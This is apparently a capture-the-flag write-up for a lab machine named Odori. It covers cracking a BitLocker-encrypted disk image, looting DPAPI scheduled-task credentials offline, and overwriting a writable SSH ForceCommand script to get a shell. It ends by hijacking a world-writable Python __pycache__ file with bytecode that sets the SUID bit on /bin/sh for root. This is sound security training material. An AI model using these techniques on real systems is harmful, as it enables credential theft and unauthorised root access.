Machine - Odori
Writeup Author: bryanmcnulty
Overview
PORT STATE SERVICE
22/tcp open ssh
139/tcp open netbios-ssn
445/tcp open microsoft-ds
VMware Disk Image
We are given a disk image file02.vmdk
.
mkdir disk-image && cd disk-image
# Extract raw partition image
7z l ../file02.vmdk
7z e ../file02.vmdk '2.Basic data partition.img'
From here we try mounting the disk but find that it is likely encrypted via Bitlocker.
Cracking BitLocker Encryption
To recover this partition, we must crack the encryption password/key. bitlocker2john
from John the Ripper can be used to create a digestable hash from this disk image.
bitlocker2john -i ./"2.Basic data partition.img" |
grep '^$bitlocker' > ../bitlocker.john
We cracked the password using the classic rockyou.txt
wordlist.
john --wordlist=/opt/rockyou.txt ./bitlocker.john # Should crack relatively quickly
Disk Forensics
We first mounted the disk image using cryptsetup
and mount
.
# Open & decrypt disk image (enter BitLocker password at prompt)
sudo cryptsetup open --type=bitlk ./"2.Basic data partition.img" odori
# Mount decrypted partition
mkdir ./mount
sudo mount --ro /dev/mapper/odori ./mount
We find the first flag at Users/Administrator/Desktop/flag.txt
Looting DPAPI Offline
We found some scheduled task credentials when performing a DPAPI triage with dploot
# important
dploot machinetriage -root ./mount -t local
dploot (https://github.com/zblurx/dploot) v3.0.1 by @_zblurx
[*] Connected to local as \ (admin)
[*] Triage SYSTEM masterkeys
{0fa91fd0-990c-4a7e-b7a9-e9cd72b0e344}:[REDACTED]
{23c71bc0-dcbc-448f-b144-26c2296c1dd7}:[REDACTED]
{4d0608b6-2a96-4d6b-9c81-b03c91485ea6}:[REDACTED]
{bb3025a7-e7d7-405e-bb83-13113f771deb}:[REDACTED]
[*] Triage SYSTEM Credentials
[CREDENTIAL]
LastWritten : 2025-01-11 13:27:40
Flags : 0x00000030 (CRED_FLAGS_REQUIRE_CONFIRMATION|CRED_FLAGS_WILDCARD_MATCH)
Persist : 0x00000002 (CRED_PERSIST_LOCAL_MACHINE)
Type : 0x00000002 (CRED_TYPE_DOMAIN_PASSWORD)
Target : Domain:batch=TaskScheduler:Task:{EB952370-3B64-45F3-814D-6F47F413A8D8}
Description :
Unknown :
Username : FILE02\svc_backup
Unknown : [REDACTED]
...
SSH
The discovered credentials work over SSH, but a shell isn't provided likely due to a forced command in the SSH configuration.
nxc ssh $rhosts -u svc_backup -p "$auth_pass"
We can still copy files using scp
though!
scp -r svc_backup@$rhosts:/home/svc_backup .
Got the second user flag @ /home/svc_backup/flag.txt
!
Let's check /etc/ssh/sshd_config
to see what command is run when an SSH session is established.
scp -r svc_backup@$rhosts:/etc/ssh/sshd_config .
grep -Ev '^\s*(#|$)' sshd_config
Include /etc/ssh/sshd_config.d/*.conf
PermitRootLogin yes
KbdInteractiveAuthentication no
UsePAM yes
X11Forwarding yes
PrintMotd no
AcceptEnv LANG LC_*
Subsystem sftp /usr/lib/openssh/sftp-server
Match group svc_backup
ForceCommand /opt/restrict /home/%u
AllowTcpForwarding no
When we log in, the command /opt/restrict /home/svc_backup
is run. It also looks like we can use SFTP.
sftp svc_backup@$rhosts # Enter password at prompt
sftp> ls -la
drwxr-x--- 5 svc_backup svc_backup 4096 Jan 15 20:39 .
drwxr-xr-x 4 root root 4096 Jan 11 10:48 ..
lrwxrwxrwx 1 root root 9 Jan 11 10:49 .bash_history
-rw-r--r-- 1 svc_backup svc_backup 220 Jan 11 10:48 .bash_logout
-rw-r--r-- 1 svc_backup svc_backup 3771 Jan 11 10:48 .bashrc
drwx------ 2 svc_backup svc_backup 4096 Jan 11 10:53 .cache
drwxrwxr-x 3 svc_backup svc_backup 4096 Jan 15 20:39 .local
-rw-r--r-- 1 svc_backup svc_backup 807 Jan 11 10:48 .profile
drwxr-xr-x 2 svc_backup svc_backup 4096 Jan 11 10:50 .ssh
-rw-rw---- 1 svc_backup svc_backup 37 Jan 15 20:39 flag.txt
sftp> cd /opt
sftp> ls -la
drwxr-xr-x 3 root root 4096 Jan 11 19:44 .
drwxr-xr-x 21 root root 4096 Jan 11 19:42 ..
drwxr-xr-x 3 root root 4096 Jan 16 21:15 archiver
-rwxrwxr-x 1 svc_backup root 48 Jan 11 19:44 restrict
sftp>
We find that the script invoked in ForceCommand
, /opt/restrict
, is actually writable! This means we can write arbitrary commands within the script that will be executed when an SSH session is established.
#!/bin/bash
/usr/lib/openssh/sftp-server -d $1
#!/bin/bash
bash -i
We uploaded the new restrict
script via scp
, then connected to the target via SSH and established a shell!
Privilege Escalation
Found a small Python application at /opt/archiver
. We found out with pspy that /opt/archiver/app.py
is run at an interval.
Archiver Application
The application doesn't do much ...
import os
from datetime import datetime, timedelta
from helper import tar_and_move_files
backup_dir = '/backup'
archive_dir = '/archive'
threshold_date = datetime.now() - timedelta(days=3*365)
def scan_and_archive_files():
if not os.path.exists(archive_dir):
os.makedirs(archive_dir)
for root, dirs, files in os.walk(backup_dir):
for file in files:
file_path = os.path.join(root, file)
file_mod_time = datetime.fromtimestamp(os.path.getmtime(file_path))
if file_mod_time < threshold_date:
print(f'Moving {file_path} to archive...')
tar_and_move_files(file_path, archive_dir)
else:
print(f'{file_path} is not old enough to archive.')
if __name__ == '__main__':
scan_and_archive_files()
import os
import subprocess
from datetime import datetime
def tar_and_move_files(file_path, archive_dir):
current_date = datetime.now().strftime('%Y-%m-%d')
tar_filename = os.path.join(archive_dir, f'{current_date}_{os.path.basename(file_path)}.tar.gz')
subprocess.Popen(["/usr/bin/tar", "-czf", tar_filename, "-C", os.path.dirname(file_path), os.path.basename(file_path)])
os.remove(file_path)
The /opt/archiver/__pycache__
directory is writable to all users, and contains compiled bytecode for the application at /opt/archiver/__pycache__/helper.cpython-310.pyc
.
total 20
drwxr-xr-x 3 root root 4096 Jan 16 21:15 .
drwxr-xr-x 3 root root 4096 Jan 11 19:44 ..
-rw-r--r-- 1 root root 812 Jan 11 19:42 app.py
-rw-r--r-- 1 root root 412 Jan 16 21:15 helper.py
drwxr-xrwx 2 root root 4096 Jan 16 21:15 __pycache__
-rw-r--r-- 1 root root 566 Jan 16 21:15 __pycache__/helper.cpython-310.pyc
Hijacking Python Application via __pycache__
Since the __pycache__
directory is writable, we can replace the compiled code for helper.py
in helper.cpython-310.pyc
.
https://realpython.com/python-pycache/#what-actions-invalidate-the-cache
We made a local copy of the application, added a malicious call to os.chmod
, installed the same Python version that the remote machine has (3.10.12
), and compiled the bytecode without hash checking.
import os
import subprocess
from datetime import datetime
os.chmod('/bin/sh', 0o4755) # Add SUID bit to /bin/sh
def tar_and_move_files(file_path, archive_dir):
current_date = datetime.now().strftime('%Y-%m-%d')
tar_filename = os.path.join(archive_dir, f'{current_date}_{os.path.basename(file_path)}.tar.gz')
subprocess.Popen(["/usr/bin/tar", "-czf", tar_filename, "-C", os.path.dirname(file_path), os.path.basename(file_path)])
os.remove(file_path)
pyenv install "3.10.12"
pyenv shell "3.10.12"
python3 -m compileall --invalidation-mode unchecked-hash .
# Now we should have our own helper.cpython-310.pyc
We then used our write permissions to delete and replace /opt/archiver/__pycache__/helper.cpython-310.pyc
with our unchecked bytecode.
Waited a bit and ran /bin/sh -p
for a root shell :)